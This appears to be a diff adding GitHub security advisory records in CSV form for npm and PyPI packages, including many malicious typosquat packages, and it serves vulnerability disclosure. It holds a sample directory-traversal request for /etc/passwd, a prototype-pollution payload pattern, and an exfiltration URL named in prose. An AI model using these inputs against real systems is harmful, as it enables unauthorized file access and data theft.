+Users may consider downgrading to version 8.4.2",[],"[{'package': {'ecosystem': 'npm', 'name': 'rc-calendar-jhorst'}, 'versions': ['8.4.3']}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/633'}]","{'cwe_ids': [], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:30:40Z', 'nvd_published_at': None}"
+1.4.0,GHSA-8whr-v3gm-w8h9,2021-10-04T21:08:30Z,2020-09-03T15:51:04Z,,[],Command Injection in node-rules,"Versions of `node-rules` prior to 5.0.0 are vulnerable to Command Injection. The package fails to sanitize input rules and passes it directly to an `eval` call when using the `fromJSON` function. This may allow attackers to execute arbitrary code in the system if the rules are user-controlled.
+
+
+## Recommendation
+
+Upgrade to version 5.0.0 or later.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:L/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': 'node-rules'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/mithunsatheesh/node-rules/issues/84'}, {'type': 'PACKAGE', 'url': 'https://github.com/mithunsatheesh/node-rules'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-NODERULES-560426'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1499'}]","{'cwe_ids': ['CWE-78'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T19:01:30Z', 'nvd_published_at': None}"
+1.4.0,GHSA-3wqh-h42r-x8fq,2020-08-31T19:00:42Z,2020-09-03T15:46:22Z,,[],Denial of Service in @hapi/subtext,"Versions of `@hapi/subtext` prior to 6.1.3 or 7.0.3 are vulnerable to Denial of Service. The Content-Encoding HTTP header parser has a vulnerability which will cause the function to throw a system error if the header contains some invalid values. Because hapi rethrows system errors (as opposed to catching expected application errors), the error is thrown all the way up the stack. If no unhandled exception handler is available, the application will exist, allowing an attacker to shut down services.
+
+
+## Recommendation
+
+Upgrade to version 6.1.3 or 7.0.3",[],"[{'package': {'ecosystem': 'npm', 'name': '@hapi/subtext'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.1.0'}, {'fixed': '6.1.3'}]}]}, {'package': {'ecosystem': 'npm', 'name': '@hapi/subtext'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.3'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1476'}]","{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T19:00:42Z', 'nvd_published_at': None}"
+1.4.0,GHSA-277p-xwpp-3jf7,2021-10-01T13:42:09Z,2020-09-02T15:49:22Z,,[],Malicious Package in rrgod,"All versions of `rrgod` are considered malicious. The package is malware designed to run arbitrary scripts. When installed, the package downloads an arbitrary file and executes its contents as a pre, post and install scripts.
+
+
+## Recommendation
+
+This package is not available on the npm Registry anymore. If you happen to find this package in your environment you should consider the system it was installed on compromised and assess if further response (such as rotating all credentials found on the compromised machine) is necessary.
+","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'rrgod'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/764'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:34:53Z', 'nvd_published_at': None}"
+1.4.0,GHSA-2mj8-pj3j-h362,2020-08-31T18:59:12Z,2020-09-04T17:17:39Z,,[],Symlink reference outside of node_modules in bin-links,"Versions of `bin-links` prior to 1.1.5 are vulnerable to a Symlink reference outside of node_modules. It is possible to create symlinks to files outside of the`node_modules` folder through the `bin` field. This may allow attackers to access unauthorized files.
+
+
+## Recommendation
+
+Upgrade to version 1.1.5 or later.",[],"[{'package': {'ecosystem': 'npm', 'name': 'bin-links'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.1.5'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1435'}]","{'cwe_ids': [], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:59:12Z', 'nvd_published_at': None}"
+1.4.0,GHSA-jwjq-vp53-ph6m,2023-09-13T20:25:22Z,2020-09-01T18:21:44Z,,['CVE-2017-16195'],Directory Traversal in pytservce,"Affected versions of `pytservce` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system.
+
+**Example request:**
+```http
+GET /../../../../../../../../../../etc/passwd HTTP/1.1
+host:foo
+```
+
+
+## Recommendation
+
+No patch is available for this vulnerability.
+
+It is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'pytservce'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-16195'}, {'type': 'WEB', 'url': 'https://github.com/JacksonGL/NPM-Vuln-PoC/blob/master/directory-traversal/pytservce'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/435'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:23:02Z', 'nvd_published_at': None}"
+1.4.0,GHSA-7cvf-p83w-48q6,2021-09-29T20:22:59Z,2020-09-03T21:37:29Z,,[],Malicious Package in beffer-xor,"Version 2.0.2 contained malicious code. The package targeted the Ethereum cryptocurrency and performed transactions to wallets not controlled by the user.
+
+
+## Recommendation
+
+Remove the package from your environment. Ensure no Ethereum funds were compromised.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/'}]","[{'package': {'ecosystem': 'npm', 'name': 'beffer-xor'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1229'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:51:34Z', 'nvd_published_at': None}"
+1.4.0,GHSA-rw53-q8x7-ccx8,2021-09-29T21:04:00Z,2020-09-03T21:55:17Z,,[],Malicious Package in buffer-xkr,"Version 2.0.2 contained malicious code. The package targeted the Ethereum cryptocurrency and performed transactions to wallets not controlled by the user.
+
+
+## Recommendation
+
+Remove the package from your environment. Ensure no Ethereum funds were compromised.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'buffer-xkr'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1245'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:52:11Z', 'nvd_published_at': None}"
+1.4.0,GHSA-g3qw-9pgp-xpj4,2020-08-31T18:32:28Z,2020-09-01T21:08:44Z,,[],Out-of-bounds Read in njwt,"Versions of `njwt` prior to 1.0.0 are vulnerable to out-of-bounds reads when a number is passed into the `base64urlEncode` function.
+
+On Node.js 6.x or lower this can expose sensitive information and on any other version of Node.js this creates a Denial of Service vulnerability.
+
+
+## Recommendation
+
+Upgrade to version 1.0.0.",[],"[{'package': {'ecosystem': 'npm', 'name': 'njwt'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://hackerone.com/reports/321704'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/679'}]","{'cwe_ids': ['CWE-125'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:32:28Z', 'nvd_published_at': None}"
+1.4.0,GHSA-2p62-c4rm-mr72,2021-09-24T14:50:56Z,2020-09-01T19:44:57Z,,[],Malicious Package in another-date-picker,"Version 2.0.43 of `another-date-picker` contained malicious code. The code when executed in the browser would enumerate password, cvc, cardnumber fields from forms and send the extracted values to `https://js-metrics.com/minjs.php?pl=`
+
+
+
+## Recommendation
+
+If version 2.0.43 of this module is found installed you will want to replace it with a version before or after 2.0.43. In addition to replacing the installed module, you will also want to evaluate your application to determine whether or not user data was compromised.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/'}]","[{'package': {'ecosystem': 'npm', 'name': 'another-date-picker'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.43'}, {'fixed': '2.0.45'}]}], 'versions': ['2.0.43']}]","[{'type': 'WEB', 'url': 'https://github.com/bi-a/mydatepicker'}, {'type': 'PACKAGE', 'url': 'https://github.com/kekeh/mydatepicker'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-ANOTHERDATEPICKER-451013'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/616'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:30:01Z', 'nvd_published_at': None}"
+1.4.0,GHSA-v2jq-9475-r5g8,2021-09-23T21:31:28Z,2020-09-01T15:29:51Z,,['CVE-2016-1000227'],Cross-Site Scripting in bootstrap-tagsinput,"All versions of `bootstrap-tagsinput` are vulnerable to cross-site scripting when user input is passed into the `itemTitle` parameter unmodified, as the package fails to properly sanitize or encode user input for that parameter.
+
+
+
+## Recommendation
+
+This package is not actively maintained, and has not seen an update since 2015.
+
+Because of this, the simplest mitigation is to avoid using the `itemTitle` parameter. With over 200 open issues and over 100 open pull requests as of 2/2018, it seems unlikely that the author has any intention of maintaining the module. If avoiding the use of `itemTitle` indefinitely is acceptable, this is a workable solution. If not, the best available mitigation is to use a fork of the module that is actively maintained and provides similar functionality. There are [many such forks to choose from available on github.](https://github.com/bootstrap-tagsinput/bootstrap-tagsinput/network/members).",[],"[{'package': {'ecosystem': 'npm', 'name': 'bootstrap-tagsinput'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.8.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2016-1000227'}, {'type': 'WEB', 'url': 'https://github.com/bootstrap-tagsinput/bootstrap-tagsinput/issues/501'}, {'type': 'PACKAGE', 'url': 'https://github.com/bootstrap-tagsinput'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/124'}]","{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:11:37Z', 'nvd_published_at': None}"
+1.4.0,GHSA-h6fg-mjxg-hqq4,2021-08-26T15:13:59Z,2020-09-25T18:28:35Z,,['CVE-2020-15202'],Integer truncation in Shard API usage,"### Impact
+The `Shard` API in TensorFlow expects the last argument to be a function taking two `int64` (i.e., `long long`) arguments:
+https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/core/util/work_sharder.h#L59-L60
+
+However, there are several places in TensorFlow where a lambda taking `int` or `int32` arguments is being used:
+https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/core/kernels/random_op.cc#L204-L205
+https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/core/kernels/random_op.cc#L317-L318
+
+In these cases, if the amount of work to be parallelized is large enough, integer truncation occurs. Depending on how the two arguments of the lambda are used, this can result in segfaults, read/write outside of heap allocated arrays, stack overflows, or data corruption.
+
+### Patches
+We have patched the issue in 27b417360cbd671ef55915e4bb6bb06af8b8a832 and ca8c013b5e97b1373b3bb1c97ea655e69f31a575. We will release patch releases for all versions between 1.15 and 2.3.
+
+We recommend users to upgrade to TensorFlow 1.15.4, 2.0.3, 2.1.2, 2.2.1, or 2.3.1.
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+### Attribution
+This vulnerability has been reported by members of the Aivul Team from Qihoo 360.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.15.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.0.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.1.0'}, {'fixed': '2.1.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.1'}]}], 'versions': ['2.2.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.1'}]}], 'versions': ['2.3.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.15.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.0.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.1.0'}, {'fixed': '2.1.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.1'}]}], 'versions': ['2.2.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.1'}]}], 'versions': ['2.3.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.15.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.0.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.1.0'}, {'fixed': '2.1.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.1'}]}], 'versions': ['2.2.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.1'}]}], 'versions': ['2.3.0']}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-h6fg-mjxg-hqq4'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-15202'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/27b417360cbd671ef55915e4bb6bb06af8b8a832'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/ca8c013b5e97b1373b3bb1c97ea655e69f31a575'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/releases/tag/v2.3.1'}, {'type': 'WEB', 'url': 'http://lists.opensuse.org/opensuse-security-announce/2020-10/msg00065.html'}]","{'cwe_ids': ['CWE-197', 'CWE-754'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-09-25T17:29:34Z', 'nvd_published_at': '2020-09-25T19:15:00Z'}"
+1.4.0,GHSA-h726-x36v-rx45,2020-08-31T18:46:04Z,2020-09-03T18:04:54Z,,[],Prototype Pollution in lodash.merge,"Versions of `lodash.merge` before 4.6.2 are vulnerable to prototype pollution. The function `merge` may allow a malicious user to modify the prototype of `Object` via `{constructor: {prototype: {...}}}` causing the addition or modification of an existing property that will exist on all objects.
+
+
+
+
+## Recommendation
+
+Update to version 4.6.2 or later.",[],"[{'package': {'ecosystem': 'npm', 'name': 'lodash.merge'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.6.2'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1066'}]","{'cwe_ids': ['CWE-1321'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:46:04Z', 'nvd_published_at': None}"
+1.4.0,GHSA-r2rg-683g-ff96,2021-09-30T20:11:07Z,2020-09-03T19:40:12Z,,[],Malicious Package in axios-http,"This package contained malicious code. The package uploaded system information such as OS and hostname to a remote server.
+
+
+## Recommendation
+
+Remove the package from your environment. There are no indications of further compromise.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'axios-http'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1123'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:48:03Z', 'nvd_published_at': None}"
+1.4.0,GHSA-6qc7-jgq7-34rf,2021-10-01T14:02:31Z,2020-09-02T20:18:18Z,,[],Malicious Package in exprss,"All versions of `exprss` typosquatted a popular package of similar name and tracked users who had installed the incorrect package. The package uploaded information to a remote server including: name of the downloaded package, name of the intended package, the Node version and whether the process was running as sudo. There is no further compromise.
+
+
+## Recommendation
+
+Remove the package from your dependencies and always ensure package names are typed correctly upon installation.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'exprss'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/851'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:38:09Z', 'nvd_published_at': None}"
+1.4.0,GHSA-jp9g-5x75-ccp8,2021-09-30T21:48:24Z,2020-09-02T21:34:30Z,,[],Malicious Package in colro-name,"Version 9.0.0 of `colro-name` contained malicious code as a preinstall script. The package downloaded a file from a remote server, executed it and opened a backdoor.
+
+
+## Recommendation
+
+Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
+
+The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'colro-name'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/902'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:39:54Z', 'nvd_published_at': None}"
+1.4.0,GHSA-x6gq-467r-hwcc,2021-10-01T13:29:35Z,2020-09-01T21:14:05Z,,[],Malicious Package in soket.js,"All versions of `soket.js` are considered malicious. The package is malware designed to take advantage of users making a mistake when typing the name of a module to install. When executed, the package calls home to a Command and Control server to execute arbitrary commands.
+
+
+## Recommendation
+
+This package was published to the npm Registry for a very short period of time. If you happen to find it in your environment you should revoke and rotate all credentials found on the compromised machine, as well as completely erase the affected machine and reinstall your Operating System.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'soket.js'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/687'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:32:47Z', 'nvd_published_at': None}"
+1.4.0,GHSA-8hqw-qp6r-vqcm,2021-10-01T20:42:42Z,2020-09-04T16:40:00Z,,[],Malicious Package in bitcoin-sweep,"All versions of this package contained malware. The package was designed to find and exfiltrate cryptocurrency wallets.
+
+
+## Recommendation
+
+Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
+
+The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'bitcoin-sweep'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1366'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:56:36Z', 'nvd_published_at': None}"
+1.4.0,GHSA-w8hg-mxvh-9h57,2021-09-24T14:49:19Z,2020-09-01T19:42:49Z,,[],Malicious Package in angular-bmap,"Version 0.0.9 of `angular-bmap` contained malicious code. The code when executed in the browser would enumerate password, cvc, cardnumber fields from forms and send the extracted values to `https://js-metrics.com/minjs.php?pl=`
+
+
+
+## Recommendation
+
+If version 0.0.9 of this module is found installed you will want to replace it with a version before or after 0.0.9. In addition to replacing the installed module, you will also want to evaluate your application to determine whether or not user data was compromised.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'angular-bmap'}, 'versions': ['0.0.9']}]","[{'type': 'PACKAGE', 'url': 'https://github.com/shenfw1987/angular-bmap'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-ANGULARBMAP-451017'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/614'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:29:57Z', 'nvd_published_at': None}"
+1.4.0,GHSA-crpm-fm48-chj7,2020-08-31T18:42:11Z,2020-09-11T21:13:44Z,,[],SQL Injection in resquel,"All versions of `resquel` are vulnerable to SQL Injection. Query parameters are not properly sanitized, allowing attackers to inject SQL statements and execute arbitrary SQL queries
+
+
+## Recommendation
+
+No fix is currently available. Consider using an alternative package until a fix is made available.",[],"[{'package': {'ecosystem': 'npm', 'name': 'resquel'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/963'}]","{'cwe_ids': ['CWE-89'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:42:11Z', 'nvd_published_at': None}"
+1.4.0,GHSA-5mm9-55c9-p5r7,2021-09-30T20:26:48Z,2020-09-03T19:53:31Z,,[],Malicious Package in mogoose,"This package contained malicious code. The package uploaded system information such as OS and hostname to a remote server.
+
+
+## Recommendation
+
+Remove the package from your environment. There are no indications of further compromise.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'mogoose'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1135'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:48:31Z', 'nvd_published_at': None}"
+1.4.0,GHSA-2mxc-m4c3-wqhq,2021-09-30T16:18:32Z,2020-09-03T22:50:46Z,,[],Malicious Package in ruffer-xor,"Version 2.0.2 contained malicious code. The package targeted the Ethereum cryptocurrency and performed transactions to wallets not controlled by the user.
+
+
+## Recommendation
+
+Remove the package from your environment. Ensure no Ethereum funds were compromised.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'ruffer-xor'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1273'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:53:19Z', 'nvd_published_at': None}"
+1.4.0,GHSA-jf8x-wg7f-p3w8,2021-09-30T20:05:28Z,2020-09-03T18:22:33Z,,[],Malicious Package in cage-js,"All versions of `cage-js` contains malicious code. The malware downloads and runs a script from a remote server as a postinstall script.
+
+
+## Recommendation
+
+Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
+
+The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'cage-js'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1085'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:46:46Z', 'nvd_published_at': None}"
+1.4.0,GHSA-28f4-mjfq-qrvf,2021-09-29T21:26:03Z,2020-09-03T22:18:40Z,,[],Malicious Package in buffes-xor,"Version 2.0.2 contained malicious code. The package targeted the Ethereum cryptocurrency and performed transactions to wallets not controlled by the user.
+
+
+## Recommendation
+
+Remove the package from your environment. Ensure no Ethereum funds were compromised.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'buffes-xor'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1257'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:52:42Z', 'nvd_published_at': None}"
+1.4.0,GHSA-vm6v-w6q2-mrrq,2021-09-30T20:09:24Z,2020-09-03T19:20:05Z,,[],Malicious Package in bb-builder,"All versions of `bb-builder` contained malicious code. The package ran an executable targeting Windows and uploaded information to a remote server.
+
+
+## Recommendation
+
+Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
+
+The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'bb-builder'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1119'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:47:54Z', 'nvd_published_at': None}"
+1.4.0,GHSA-jxf5-7x3j-8j9m,2021-09-30T20:05:11Z,2020-09-03T18:19:14Z,,[],Malicious Package in load-from-cwd-or-npm,"Version 3.0.2 of `load-from-cwd-or-npm` contains malicious code. The malware breaks functionality of the `purescript-installer` package by injecting targeted code.
+
+
+## Recommendation
+
